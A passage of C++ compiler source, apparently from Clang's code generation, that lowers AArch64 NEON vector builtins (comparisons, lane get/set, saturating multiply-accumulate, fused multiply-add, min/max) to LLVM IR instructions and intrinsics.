switch (BuiltinID) {
default: llvm_unreachable("missing builtin ID in switch!");
case NEON::BI__builtin_neon_vceqs_f32: P = llvm::FCmpInst::FCMP_OEQ; break;
case NEON::BI__builtin_neon_vcles_f32: P = llvm::FCmpInst::FCMP_OLE; break;
case NEON::BI__builtin_neon_vclts_f32: P = llvm::FCmpInst::FCMP_OLT; break;
case NEON::BI__builtin_neon_vcges_f32: P = llvm::FCmpInst::FCMP_OGE; break;
case NEON::BI__builtin_neon_vcgts_f32: P = llvm::FCmpInst::FCMP_OGT; break;
}
Ops.push_back(EmitScalarExpr(E->getArg(1)));
Ops[0] = Builder.CreateBitCast(Ops[0], FloatTy);
Ops[1] = Builder.CreateBitCast(Ops[1], FloatTy);
Ops[0] = Builder.CreateFCmp(P, Ops[0], Ops[1]);
return Builder.CreateSExt(Ops[0], Int32Ty, "vcmpd");
}
case NEON::BI__builtin_neon_vceqh_f16:
case NEON::BI__builtin_neon_vcleh_f16:
case NEON::BI__builtin_neon_vclth_f16:
case NEON::BI__builtin_neon_vcgeh_f16:
case NEON::BI__builtin_neon_vcgth_f16: {
llvm::CmpInst::Predicate P;
switch (BuiltinID) {
default: llvm_unreachable("missing builtin ID in switch!");
case NEON::BI__builtin_neon_vceqh_f16: P = llvm::FCmpInst::FCMP_OEQ; break;
case NEON::BI__builtin_neon_vcleh_f16: P = llvm::FCmpInst::FCMP_OLE; break;
case NEON::BI__builtin_neon_vclth_f16: P = llvm::FCmpInst::FCMP_OLT; break;
case NEON::BI__builtin_neon_vcgeh_f16: P = llvm::FCmpInst::FCMP_OGE; break;
case NEON::BI__builtin_neon_vcgth_f16: P = llvm::FCmpInst::FCMP_OGT; break;
}
Ops.push_back(EmitScalarExpr(E->getArg(1)));
Ops[0] = Builder.CreateBitCast(Ops[0], HalfTy);
Ops[1] = Builder.CreateBitCast(Ops[1], HalfTy);
Ops[0] = Builder.CreateFCmp(P, Ops[0], Ops[1]);
return Builder.CreateSExt(Ops[0], Int16Ty, "vcmpd");
}
case NEON::BI__builtin_neon_vceqd_s64:
case NEON::BI__builtin_neon_vceqd_u64:
case NEON::BI__builtin_neon_vcgtd_s64:
case NEON::BI__builtin_neon_vcgtd_u64:
case NEON::BI__builtin_neon_vcltd_s64:
case NEON::BI__builtin_neon_vcltd_u64:
case NEON::BI__builtin_neon_vcged_u64:
case NEON::BI__builtin_neon_vcged_s64:
case NEON::BI__builtin_neon_vcled_u64:
case NEON::BI__builtin_neon_vcled_s64: {
llvm::CmpInst::Predicate P;
switch (BuiltinID) {
default: llvm_unreachable("missing builtin ID in switch!");
case NEON::BI__builtin_neon_vceqd_s64:
case NEON::BI__builtin_neon_vceqd_u64:P = llvm::ICmpInst::ICMP_EQ;break;
case NEON::BI__builtin_neon_vcgtd_s64:P = llvm::ICmpInst::ICMP_SGT;break;
case NEON::BI__builtin_neon_vcgtd_u64:P = llvm::ICmpInst::ICMP_UGT;break;
case NEON::BI__builtin_neon_vcltd_s64:P = llvm::ICmpInst::ICMP_SLT;break;
case NEON::BI__builtin_neon_vcltd_u64:P = llvm::ICmpInst::ICMP_ULT;break;
case NEON::BI__builtin_neon_vcged_u64:P = llvm::ICmpInst::ICMP_UGE;break;
case NEON::BI__builtin_neon_vcged_s64:P = llvm::ICmpInst::ICMP_SGE;break;
case NEON::BI__builtin_neon_vcled_u64:P = llvm::ICmpInst::ICMP_ULE;break;
case NEON::BI__builtin_neon_vcled_s64:P = llvm::ICmpInst::ICMP_SLE;break;
}
Ops.push_back(EmitScalarExpr(E->getArg(1)));
Ops[0] = Builder.CreateBitCast(Ops[0], Int64Ty);
Ops[1] = Builder.CreateBitCast(Ops[1], Int64Ty);
Ops[0] = Builder.CreateICmp(P, Ops[0], Ops[1]);
return Builder.CreateSExt(Ops[0], Int64Ty, "vceqd");
}
case NEON::BI__builtin_neon_vtstd_s64:
case NEON::BI__builtin_neon_vtstd_u64: {
Ops.push_back(EmitScalarExpr(E->getArg(1)));
Ops[0] = Builder.CreateBitCast(Ops[0], Int64Ty);
Ops[1] = Builder.CreateBitCast(Ops[1], Int64Ty);
Ops[0] = Builder.CreateAnd(Ops[0], Ops[1]);
Ops[0] = Builder.CreateICmp(ICmpInst::ICMP_NE, Ops[0],
llvm::Constant::getNullValue(Int64Ty));
return Builder.CreateSExt(Ops[0], Int64Ty, "vtstd");
}
case NEON::BI__builtin_neon_vset_lane_i8:
case NEON::BI__builtin_neon_vset_lane_i16:
case NEON::BI__builtin_neon_vset_lane_i32:
case NEON::BI__builtin_neon_vset_lane_i64:
case NEON::BI__builtin_neon_vset_lane_bf16:
case NEON::BI__builtin_neon_vset_lane_f32:
case NEON::BI__builtin_neon_vsetq_lane_i8:
case NEON::BI__builtin_neon_vsetq_lane_i16:
case NEON::BI__builtin_neon_vsetq_lane_i32:
case NEON::BI__builtin_neon_vsetq_lane_i64:
case NEON::BI__builtin_neon_vsetq_lane_bf16:
case NEON::BI__builtin_neon_vsetq_lane_f32:
Ops.push_back(EmitScalarExpr(E->getArg(2)));
return Builder.CreateInsertElement(Ops[1], Ops[0], Ops[2], "vset_lane");
case NEON::BI__builtin_neon_vset_lane_f64:
// The vector type needs a cast for the v1f64 variant.
Ops[1] =
Builder.CreateBitCast(Ops[1], llvm::FixedVectorType::get(DoubleTy, 1));
Ops.push_back(EmitScalarExpr(E->getArg(2)));
return Builder.CreateInsertElement(Ops[1], Ops[0], Ops[2], "vset_lane");
case NEON::BI__builtin_neon_vsetq_lane_f64:
// The vector type needs a cast for the v2f64 variant.
Ops[1] =
Builder.CreateBitCast(Ops[1], llvm::FixedVectorType::get(DoubleTy, 2));
Ops.push_back(EmitScalarExpr(E->getArg(2)));
return Builder.CreateInsertElement(Ops[1], Ops[0], Ops[2], "vset_lane");
case NEON::BI__builtin_neon_vget_lane_i8:
case NEON::BI__builtin_neon_vdupb_lane_i8:
Ops[0] =
Builder.CreateBitCast(Ops[0], llvm::FixedVectorType::get(Int8Ty, 8));
return Builder.CreateExtractElement(Ops[0], EmitScalarExpr(E->getArg(1)),
"vget_lane");
case NEON::BI__builtin_neon_vgetq_lane_i8:
case NEON::BI__builtin_neon_vdupb_laneq_i8:
Ops[0] =
Builder.CreateBitCast(Ops[0], llvm::FixedVectorType::get(Int8Ty, 16));
return Builder.CreateExtractElement(Ops[0], EmitScalarExpr(E->getArg(1)),
"vgetq_lane");
case NEON::BI__builtin_neon_vget_lane_i16:
case NEON::BI__builtin_neon_vduph_lane_i16:
Ops[0] =
Builder.CreateBitCast(Ops[0], llvm::FixedVectorType::get(Int16Ty, 4));
return Builder.CreateExtractElement(Ops[0], EmitScalarExpr(E->getArg(1)),
"vget_lane");
case NEON::BI__builtin_neon_vgetq_lane_i16:
case NEON::BI__builtin_neon_vduph_laneq_i16:
Ops[0] =
Builder.CreateBitCast(Ops[0], llvm::FixedVectorType::get(Int16Ty, 8));
return Builder.CreateExtractElement(Ops[0], EmitScalarExpr(E->getArg(1)),
"vgetq_lane");
case NEON::BI__builtin_neon_vget_lane_i32:
case NEON::BI__builtin_neon_vdups_lane_i32:
Ops[0] =
Builder.CreateBitCast(Ops[0], llvm::FixedVectorType::get(Int32Ty, 2));
return Builder.CreateExtractElement(Ops[0], EmitScalarExpr(E->getArg(1)),
"vget_lane");
case NEON::BI__builtin_neon_vdups_lane_f32:
Ops[0] =
Builder.CreateBitCast(Ops[0], llvm::FixedVectorType::get(FloatTy, 2));
return Builder.CreateExtractElement(Ops[0], EmitScalarExpr(E->getArg(1)),
"vdups_lane");
case NEON::BI__builtin_neon_vgetq_lane_i32:
case NEON::BI__builtin_neon_vdups_laneq_i32:
Ops[0] =
Builder.CreateBitCast(Ops[0], llvm::FixedVectorType::get(Int32Ty, 4));
return Builder.CreateExtractElement(Ops[0], EmitScalarExpr(E->getArg(1)),
"vgetq_lane");
case NEON::BI__builtin_neon_vget_lane_i64:
case NEON::BI__builtin_neon_vdupd_lane_i64:
Ops[0] =
Builder.CreateBitCast(Ops[0], llvm::FixedVectorType::get(Int64Ty, 1));
return Builder.CreateExtractElement(Ops[0], EmitScalarExpr(E->getArg(1)),
"vget_lane");
case NEON::BI__builtin_neon_vdupd_lane_f64:
Ops[0] =
Builder.CreateBitCast(Ops[0], llvm::FixedVectorType::get(DoubleTy, 1));
return Builder.CreateExtractElement(Ops[0], EmitScalarExpr(E->getArg(1)),
"vdupd_lane");
case NEON::BI__builtin_neon_vgetq_lane_i64:
case NEON::BI__builtin_neon_vdupd_laneq_i64:
Ops[0] =
Builder.CreateBitCast(Ops[0], llvm::FixedVectorType::get(Int64Ty, 2));
return Builder.CreateExtractElement(Ops[0], EmitScalarExpr(E->getArg(1)),
"vgetq_lane");
case NEON::BI__builtin_neon_vget_lane_f32:
Ops[0] =
Builder.CreateBitCast(Ops[0], llvm::FixedVectorType::get(FloatTy, 2));
return Builder.CreateExtractElement(Ops[0], EmitScalarExpr(E->getArg(1)),
"vget_lane");
case NEON::BI__builtin_neon_vget_lane_f64:
Ops[0] =
Builder.CreateBitCast(Ops[0], llvm::FixedVectorType::get(DoubleTy, 1));
return Builder.CreateExtractElement(Ops[0], EmitScalarExpr(E->getArg(1)),
"vget_lane");
case NEON::BI__builtin_neon_vgetq_lane_f32:
case NEON::BI__builtin_neon_vdups_laneq_f32:
Ops[0] =
Builder.CreateBitCast(Ops[0], llvm::FixedVectorType::get(FloatTy, 4));
return Builder.CreateExtractElement(Ops[0], EmitScalarExpr(E->getArg(1)),
"vgetq_lane");
case NEON::BI__builtin_neon_vgetq_lane_f64:
case NEON::BI__builtin_neon_vdupd_laneq_f64:
Ops[0] =
Builder.CreateBitCast(Ops[0], llvm::FixedVectorType::get(DoubleTy, 2));
return Builder.CreateExtractElement(Ops[0], EmitScalarExpr(E->getArg(1)),
"vgetq_lane");
case NEON::BI__builtin_neon_vaddh_f16:
Ops.push_back(EmitScalarExpr(E->getArg(1)));
return Builder.CreateFAdd(Ops[0], Ops[1], "vaddh");
case NEON::BI__builtin_neon_vsubh_f16:
Ops.push_back(EmitScalarExpr(E->getArg(1)));
return Builder.CreateFSub(Ops[0], Ops[1], "vsubh");
case NEON::BI__builtin_neon_vmulh_f16:
Ops.push_back(EmitScalarExpr(E->getArg(1)));
return Builder.CreateFMul(Ops[0], Ops[1], "vmulh");
case NEON::BI__builtin_neon_vdivh_f16:
Ops.push_back(EmitScalarExpr(E->getArg(1)));
return Builder.CreateFDiv(Ops[0], Ops[1], "vdivh");
case NEON::BI__builtin_neon_vfmah_f16:
// NEON intrinsic puts accumulator first, unlike the LLVM fma.
return emitCallMaybeConstrainedFPBuiltin(
*this, Intrinsic::fma, Intrinsic::experimental_constrained_fma, HalfTy,
{EmitScalarExpr(E->getArg(1)), EmitScalarExpr(E->getArg(2)), Ops[0]});
case NEON::BI__builtin_neon_vfmsh_f16: {
// FIXME: This should be an fneg instruction:
Value *Zero = llvm::ConstantFP::getZeroValueForNegation(HalfTy);
Value* Sub = Builder.CreateFSub(Zero, EmitScalarExpr(E->getArg(1)), "vsubh");
// NEON intrinsic puts accumulator first, unlike the LLVM fma.
return emitCallMaybeConstrainedFPBuiltin(
*this, Intrinsic::fma, Intrinsic::experimental_constrained_fma, HalfTy,
{Sub, EmitScalarExpr(E->getArg(2)), Ops[0]});
}
case NEON::BI__builtin_neon_vaddd_s64:
case NEON::BI__builtin_neon_vaddd_u64:
return Builder.CreateAdd(Ops[0], EmitScalarExpr(E->getArg(1)), "vaddd");
case NEON::BI__builtin_neon_vsubd_s64:
case NEON::BI__builtin_neon_vsubd_u64:
return Builder.CreateSub(Ops[0], EmitScalarExpr(E->getArg(1)), "vsubd");
case NEON::BI__builtin_neon_vqdmlalh_s16:
case NEON::BI__builtin_neon_vqdmlslh_s16: {
SmallVector<Value *, 2> ProductOps;
ProductOps.push_back(vectorWrapScalar16(Ops[1]));
ProductOps.push_back(vectorWrapScalar16(EmitScalarExpr(E->getArg(2))));
auto *VTy = llvm::FixedVectorType::get(Int32Ty, 4);
Ops[1] = EmitNeonCall(CGM.getIntrinsic(Intrinsic::aarch64_neon_sqdmull, VTy),
ProductOps, "vqdmlXl");
Constant *CI = ConstantInt::get(SizeTy, 0);
Ops[1] = Builder.CreateExtractElement(Ops[1], CI, "lane0");
unsigned AccumInt = BuiltinID == NEON::BI__builtin_neon_vqdmlalh_s16
? Intrinsic::aarch64_neon_sqadd
: Intrinsic::aarch64_neon_sqsub;
return EmitNeonCall(CGM.getIntrinsic(AccumInt, Int32Ty), Ops, "vqdmlXl");
}
case NEON::BI__builtin_neon_vqshlud_n_s64: {
Ops.push_back(EmitScalarExpr(E->getArg(1)));
Ops[1] = Builder.CreateZExt(Ops[1], Int64Ty);
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::aarch64_neon_sqshlu, Int64Ty),
Ops, "vqshlu_n");
}
case NEON::BI__builtin_neon_vqshld_n_u64:
case NEON::BI__builtin_neon_vqshld_n_s64: {
unsigned Int = BuiltinID == NEON::BI__builtin_neon_vqshld_n_u64
? Intrinsic::aarch64_neon_uqshl
: Intrinsic::aarch64_neon_sqshl;
Ops.push_back(EmitScalarExpr(E->getArg(1)));
Ops[1] = Builder.CreateZExt(Ops[1], Int64Ty);
return EmitNeonCall(CGM.getIntrinsic(Int, Int64Ty), Ops, "vqshl_n");
}
case NEON::BI__builtin_neon_vrshrd_n_u64:
case NEON::BI__builtin_neon_vrshrd_n_s64: {
unsigned Int = BuiltinID == NEON::BI__builtin_neon_vrshrd_n_u64
? Intrinsic::aarch64_neon_urshl
: Intrinsic::aarch64_neon_srshl;
Ops.push_back(EmitScalarExpr(E->getArg(1)));
int SV = cast<ConstantInt>(Ops[1])->getSExtValue();
Ops[1] = ConstantInt::get(Int64Ty, -SV);
return EmitNeonCall(CGM.getIntrinsic(Int, Int64Ty), Ops, "vrshr_n");
}
case NEON::BI__builtin_neon_vrsrad_n_u64:
case NEON::BI__builtin_neon_vrsrad_n_s64: {
unsigned Int = BuiltinID == NEON::BI__builtin_neon_vrsrad_n_u64
? Intrinsic::aarch64_neon_urshl
: Intrinsic::aarch64_neon_srshl;
Ops[1] = Builder.CreateBitCast(Ops[1], Int64Ty);
Ops.push_back(Builder.CreateNeg(EmitScalarExpr(E->getArg(2))));
Ops[1] = Builder.CreateCall(CGM.getIntrinsic(Int, Int64Ty),
{Ops[1], Builder.CreateSExt(Ops[2], Int64Ty)});
return Builder.CreateAdd(Ops[0], Builder.CreateBitCast(Ops[1], Int64Ty));
}
case NEON::BI__builtin_neon_vshld_n_s64:
case NEON::BI__builtin_neon_vshld_n_u64: {
llvm::ConstantInt *Amt = cast<ConstantInt>(EmitScalarExpr(E->getArg(1)));
return Builder.CreateShl(
Ops[0], ConstantInt::get(Int64Ty, Amt->getZExtValue()), "shld_n");
}
case NEON::BI__builtin_neon_vshrd_n_s64: {
llvm::ConstantInt *Amt = cast<ConstantInt>(EmitScalarExpr(E->getArg(1)));
return Builder.CreateAShr(
Ops[0], ConstantInt::get(Int64Ty, std::min(static_cast<uint64_t>(63),
Amt->getZExtValue())),
"shrd_n");
}
case NEON::BI__builtin_neon_vshrd_n_u64: {
llvm::ConstantInt *Amt = cast<ConstantInt>(EmitScalarExpr(E->getArg(1)));
uint64_t ShiftAmt = Amt->getZExtValue();
// Right-shifting an unsigned value by its size yields 0.
if (ShiftAmt == 64)
return ConstantInt::get(Int64Ty, 0);
return Builder.CreateLShr(Ops[0], ConstantInt::get(Int64Ty, ShiftAmt),
"shrd_n");
}
case NEON::BI__builtin_neon_vsrad_n_s64: {
llvm::ConstantInt *Amt = cast<ConstantInt>(EmitScalarExpr(E->getArg(2)));
Ops[1] = Builder.CreateAShr(
Ops[1], ConstantInt::get(Int64Ty, std::min(static_cast<uint64_t>(63),
Amt->getZExtValue())),
"shrd_n");
return Builder.CreateAdd(Ops[0], Ops[1]);
}
case NEON::BI__builtin_neon_vsrad_n_u64: {
llvm::ConstantInt *Amt = cast<ConstantInt>(EmitScalarExpr(E->getArg(2)));
uint64_t ShiftAmt = Amt->getZExtValue();
// Right-shifting an unsigned value by its size yields 0.
// As Op + 0 = Op, return Ops[0] directly.
if (ShiftAmt == 64)
return Ops[0];
Ops[1] = Builder.CreateLShr(Ops[1], ConstantInt::get(Int64Ty, ShiftAmt),
"shrd_n");
return Builder.CreateAdd(Ops[0], Ops[1]);
}
case NEON::BI__builtin_neon_vqdmlalh_lane_s16:
case NEON::BI__builtin_neon_vqdmlalh_laneq_s16:
case NEON::BI__builtin_neon_vqdmlslh_lane_s16:
case NEON::BI__builtin_neon_vqdmlslh_laneq_s16: {
Ops[2] = Builder.CreateExtractElement(Ops[2], EmitScalarExpr(E->getArg(3)),
"lane");
SmallVector<Value *, 2> ProductOps;
ProductOps.push_back(vectorWrapScalar16(Ops[1]));
ProductOps.push_back(vectorWrapScalar16(Ops[2]));
auto *VTy = llvm::FixedVectorType::get(Int32Ty, 4);
Ops[1] = EmitNeonCall(CGM.getIntrinsic(Intrinsic::aarch64_neon_sqdmull, VTy),
ProductOps, "vqdmlXl");
Constant *CI = ConstantInt::get(SizeTy, 0);
Ops[1] = Builder.CreateExtractElement(Ops[1], CI, "lane0");
Ops.pop_back();
unsigned AccInt = (BuiltinID == NEON::BI__builtin_neon_vqdmlalh_lane_s16 ||
BuiltinID == NEON::BI__builtin_neon_vqdmlalh_laneq_s16)
? Intrinsic::aarch64_neon_sqadd
: Intrinsic::aarch64_neon_sqsub;
return EmitNeonCall(CGM.getIntrinsic(AccInt, Int32Ty), Ops, "vqdmlXl");
}
case NEON::BI__builtin_neon_vqdmlals_s32:
case NEON::BI__builtin_neon_vqdmlsls_s32: {
SmallVector<Value *, 2> ProductOps;
ProductOps.push_back(Ops[1]);
ProductOps.push_back(EmitScalarExpr(E->getArg(2)));
Ops[1] =
EmitNeonCall(CGM.getIntrinsic(Intrinsic::aarch64_neon_sqdmulls_scalar),
ProductOps, "vqdmlXl");
unsigned AccumInt = BuiltinID == NEON::BI__builtin_neon_vqdmlals_s32
? Intrinsic::aarch64_neon_sqadd
: Intrinsic::aarch64_neon_sqsub;
return EmitNeonCall(CGM.getIntrinsic(AccumInt, Int64Ty), Ops, "vqdmlXl");
}
case NEON::BI__builtin_neon_vqdmlals_lane_s32:
case NEON::BI__builtin_neon_vqdmlals_laneq_s32:
case NEON::BI__builtin_neon_vqdmlsls_lane_s32:
case NEON::BI__builtin_neon_vqdmlsls_laneq_s32: {
Ops[2] = Builder.CreateExtractElement(Ops[2], EmitScalarExpr(E->getArg(3)),
"lane");
SmallVector<Value *, 2> ProductOps;
ProductOps.push_back(Ops[1]);
ProductOps.push_back(Ops[2]);
Ops[1] =
EmitNeonCall(CGM.getIntrinsic(Intrinsic::aarch64_neon_sqdmulls_scalar),
ProductOps, "vqdmlXl");
Ops.pop_back();
unsigned AccInt = (BuiltinID == NEON::BI__builtin_neon_vqdmlals_lane_s32 ||
BuiltinID == NEON::BI__builtin_neon_vqdmlals_laneq_s32)
? Intrinsic::aarch64_neon_sqadd
: Intrinsic::aarch64_neon_sqsub;
return EmitNeonCall(CGM.getIntrinsic(AccInt, Int64Ty), Ops, "vqdmlXl");
}
case NEON::BI__builtin_neon_vget_lane_bf16:
case NEON::BI__builtin_neon_vduph_lane_bf16:
case NEON::BI__builtin_neon_vduph_lane_f16: {
return Builder.CreateExtractElement(Ops[0], EmitScalarExpr(E->getArg(1)),
"vget_lane");
}
case NEON::BI__builtin_neon_vgetq_lane_bf16:
case NEON::BI__builtin_neon_vduph_laneq_bf16:
case NEON::BI__builtin_neon_vduph_laneq_f16: {
return Builder.CreateExtractElement(Ops[0], EmitScalarExpr(E->getArg(1)),
"vgetq_lane");
}
case AArch64::BI_InterlockedAdd: {
Value *Arg0 = EmitScalarExpr(E->getArg(0));
Value *Arg1 = EmitScalarExpr(E->getArg(1));
AtomicRMWInst *RMWI = Builder.CreateAtomicRMW(
AtomicRMWInst::Add, Arg0, Arg1,
llvm::AtomicOrdering::SequentiallyConsistent);
return Builder.CreateAdd(RMWI, Arg1);
}
}
llvm::FixedVectorType *VTy = GetNeonType(this, Type);
llvm::Type *Ty = VTy;
if (!Ty)
return nullptr;
// Not all intrinsics handled by the common case work for AArch64 yet, so only
// defer to common code if it's been added to our special map.
Builtin = findARMVectorIntrinsicInMap(AArch64SIMDIntrinsicMap, BuiltinID,
AArch64SIMDIntrinsicsProvenSorted);
if (Builtin)
return EmitCommonNeonBuiltinExpr(
Builtin->BuiltinID, Builtin->LLVMIntrinsic, Builtin->AltLLVMIntrinsic,
Builtin->NameHint, Builtin->TypeModifier, E, Ops,
/*never use addresses*/ Address::invalid(), Address::invalid(), Arch);
if (Value *V = EmitAArch64TblBuiltinExpr(*this, BuiltinID, E, Ops, Arch))
return V;
unsigned Int;
switch (BuiltinID) {
default: return nullptr;
case NEON::BI__builtin_neon_vbsl_v:
case NEON::BI__builtin_neon_vbslq_v: {
llvm::Type *BitTy = llvm::VectorType::getInteger(VTy);
Ops[0] = Builder.CreateBitCast(Ops[0], BitTy, "vbsl");
Ops[1] = Builder.CreateBitCast(Ops[1], BitTy, "vbsl");
Ops[2] = Builder.CreateBitCast(Ops[2], BitTy, "vbsl");
Ops[1] = Builder.CreateAnd(Ops[0], Ops[1], "vbsl");
Ops[2] = Builder.CreateAnd(Builder.CreateNot(Ops[0]), Ops[2], "vbsl");
Ops[0] = Builder.CreateOr(Ops[1], Ops[2], "vbsl");
return Builder.CreateBitCast(Ops[0], Ty);
}
case NEON::BI__builtin_neon_vfma_lane_v:
case NEON::BI__builtin_neon_vfmaq_lane_v: { // Only used for FP types
// The ARM builtins (and instructions) have the addend as the first
// operand, but the 'fma' intrinsics have it last. Swap it around here.
Value *Addend = Ops[0];
Value *Multiplicand = Ops[1];
Value *LaneSource = Ops[2];
Ops[0] = Multiplicand;
Ops[1] = LaneSource;
Ops[2] = Addend;
// Now adjust things to handle the lane access.
auto *SourceTy = BuiltinID == NEON::BI__builtin_neon_vfmaq_lane_v
? llvm::FixedVectorType::get(VTy->getElementType(),
VTy->getNumElements() / 2)
: VTy;
llvm::Constant *cst = cast<Constant>(Ops[3]);
Value *SV = llvm::ConstantVector::getSplat(VTy->getElementCount(), cst);
Ops[1] = Builder.CreateBitCast(Ops[1], SourceTy);
Ops[1] = Builder.CreateShuffleVector(Ops[1], Ops[1], SV, "lane");
Ops.pop_back();
Int = Builder.getIsFPConstrained() ? Intrinsic::experimental_constrained_fma
: Intrinsic::fma;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "fmla");
}
case NEON::BI__builtin_neon_vfma_laneq_v: {
auto *VTy = cast<llvm::FixedVectorType>(Ty);
// v1f64 fma should be mapped to Neon scalar f64 fma
if (VTy && VTy->getElementType() == DoubleTy) {
Ops[0] = Builder.CreateBitCast(Ops[0], DoubleTy);
Ops[1] = Builder.CreateBitCast(Ops[1], DoubleTy);
llvm::FixedVectorType *VTy =
GetNeonType(this, NeonTypeFlags(NeonTypeFlags::Float64, false, true));
Ops[2] = Builder.CreateBitCast(Ops[2], VTy);
Ops[2] = Builder.CreateExtractElement(Ops[2], Ops[3], "extract");
Value *Result;
Result = emitCallMaybeConstrainedFPBuiltin(
*this, Intrinsic::fma, Intrinsic::experimental_constrained_fma,
DoubleTy, {Ops[1], Ops[2], Ops[0]});
return Builder.CreateBitCast(Result, Ty);
}
Ops[0] = Builder.CreateBitCast(Ops[0], Ty);
Ops[1] = Builder.CreateBitCast(Ops[1], Ty);
auto *STy = llvm::FixedVectorType::get(VTy->getElementType(),
VTy->getNumElements() * 2);
Ops[2] = Builder.CreateBitCast(Ops[2], STy);
Value *SV = llvm::ConstantVector::getSplat(VTy->getElementCount(),
cast<ConstantInt>(Ops[3]));
Ops[2] = Builder.CreateShuffleVector(Ops[2], Ops[2], SV, "lane");
return emitCallMaybeConstrainedFPBuiltin(
*this, Intrinsic::fma, Intrinsic::experimental_constrained_fma, Ty,
{Ops[2], Ops[1], Ops[0]});
}
case NEON::BI__builtin_neon_vfmaq_laneq_v: {
Ops[0] = Builder.CreateBitCast(Ops[0], Ty);
Ops[1] = Builder.CreateBitCast(Ops[1], Ty);
Ops[2] = Builder.CreateBitCast(Ops[2], Ty);
Ops[2] = EmitNeonSplat(Ops[2], cast<ConstantInt>(Ops[3]));
return emitCallMaybeConstrainedFPBuiltin(
*this, Intrinsic::fma, Intrinsic::experimental_constrained_fma, Ty,
{Ops[2], Ops[1], Ops[0]});
}
case NEON::BI__builtin_neon_vfmah_lane_f16:
case NEON::BI__builtin_neon_vfmas_lane_f32:
case NEON::BI__builtin_neon_vfmah_laneq_f16:
case NEON::BI__builtin_neon_vfmas_laneq_f32:
case NEON::BI__builtin_neon_vfmad_lane_f64:
case NEON::BI__builtin_neon_vfmad_laneq_f64: {
Ops.push_back(EmitScalarExpr(E->getArg(3)));
llvm::Type *Ty = ConvertType(E->getCallReturnType(getContext()));
Ops[2] = Builder.CreateExtractElement(Ops[2], Ops[3], "extract");
return emitCallMaybeConstrainedFPBuiltin(
*this, Intrinsic::fma, Intrinsic::experimental_constrained_fma, Ty,
{Ops[1], Ops[2], Ops[0]});
}
case NEON::BI__builtin_neon_vmull_v:
// FIXME: improve sharing scheme to cope with 3 alternative LLVM intrinsics.
Int = usgn ? Intrinsic::aarch64_neon_umull : Intrinsic::aarch64_neon_smull;
if (Type.isPoly()) Int = Intrinsic::aarch64_neon_pmull;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vmull");
case NEON::BI__builtin_neon_vmax_v:
case NEON::BI__builtin_neon_vmaxq_v:
// FIXME: improve sharing scheme to cope with 3 alternative LLVM intrinsics.
Int = usgn ? Intrinsic::aarch64_neon_umax : Intrinsic::aarch64_neon_smax;
if (Ty->isFPOrFPVectorTy()) Int = Intrinsic::aarch64_neon_fmax;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vmax");
case NEON::BI__builtin_neon_vmaxh_f16: {
Ops.push_back(EmitScalarExpr(E->getArg(1)));
Int = Intrinsic::aarch64_neon_fmax;
return EmitNeonCall(CGM.getIntrinsic(Int, HalfTy), Ops, "vmax");
}
case NEON::BI__builtin_neon_vmin_v:
case NEON::BI__builtin_neon_vminq_v:
// FIXME: improve sharing scheme to cope with 3 alternative LLVM intrinsics.
Int = usgn ? Intrinsic::aarch64_neon_umin : Intrinsic::aarch64_neon_smin;
if (Ty->isFPOrFPVectorTy()) Int = Intrinsic::aarch64_neon_fmin;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vmin");
case NEON::BI__builtin_neon_vminh_f16: {
Ops.push_back(EmitScalarExpr(E->getArg(1)));
Int = Intrinsic::aarch64_neon_fmin;
return EmitNeonCall(CGM.getIntrinsic(Int, HalfTy), Ops, "vmin");
}
case NEON::BI__builtin_neon_vabd_v:
case NEON::BI__builtin_neon_vabdq_v:
// FIXME: improve sharing scheme to cope with 3 alternative LLVM intrinsics.
Int = usgn ? Intrinsic::aarch64_neon_uabd : Intrinsic::aarch64_neon_sabd;
if (Ty->isFPOrFPVectorTy()) Int = Intrinsic::aarch64_neon_fabd;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vabd");
case NEON::BI__builtin_neon_vpadal_v:
case NEON::BI__builtin_neon_vpadalq_v: {
unsigned ArgElts = VTy->getNumElements();
llvm::IntegerType *EltTy = cast<IntegerType>(VTy->getElementType());
unsigned BitWidth = EltTy->getBitWidth();
auto *ArgTy = llvm::FixedVectorType::get(
llvm::IntegerType::get(getLLVMContext(), BitWidth / 2), 2 * ArgElts);
llvm::Type* Tys[2] = { VTy, ArgTy };
Int = usgn ? Intrinsic::aarch64_neon_uaddlp : Intrinsic::aarch64_neon_saddlp;
SmallVector<llvm::Value*, 1> TmpOps;
TmpOps.push_back(Ops[1]);
Function *F = CGM.getIntrinsic(Int, Tys);
llvm::Value *tmp = EmitNeonCall(F, TmpOps, "vpadal");
llvm::Value *addend = Builder.CreateBitCast(Ops[0], tmp->getType());
return Builder.CreateAdd(tmp, addend);
}
case NEON::BI__builtin_neon_vpmin_v:
case NEON::BI__builtin_neon_vpminq_v:
// FIXME: improve sharing scheme to cope with 3 alternative LLVM intrinsics.
Int = usgn ? Intrinsic::aarch64_neon_uminp : Intrinsic::aarch64_neon_sminp;
if (Ty->isFPOrFPVectorTy()) Int = Intrinsic::aarch64_neon_fminp;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vpmin");
case NEON::BI__builtin_neon_vpmax_v:
case NEON::BI__builtin_neon_vpmaxq_v:
// FIXME: improve sharing scheme to cope with 3 alternative LLVM intrinsics.
Int = usgn ? Intrinsic::aarch64_neon_umaxp : Intrinsic::aarch64_neon_smaxp;
if (Ty->isFPOrFPVectorTy()) Int = Intrinsic::aarch64_neon_fmaxp;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vpmax");
case NEON::BI__builtin_neon_vminnm_v:
case NEON::BI__builtin_neon_vminnmq_v:
Int = Intrinsic::aarch64_neon_fminnm;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vminnm");
case NEON::BI__builtin_neon_vminnmh_f16:
Ops.push_back(EmitScalarExpr(E->getArg(1)));
Int = Intrinsic::aarch64_neon_fminnm;
return EmitNeonCall(CGM.getIntrinsic(Int, HalfTy), Ops, "vminnm");
case NEON::BI__builtin_neon_vmaxnm_v:
case NEON::BI__builtin_neon_vmaxnmq_v:
Int = Intrinsic::aarch64_neon_fmaxnm;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vmaxnm");
case NEON::BI__builtin_neon_vmaxnmh_f16:
Ops.push_back(EmitScalarExpr(E->getArg(1)));
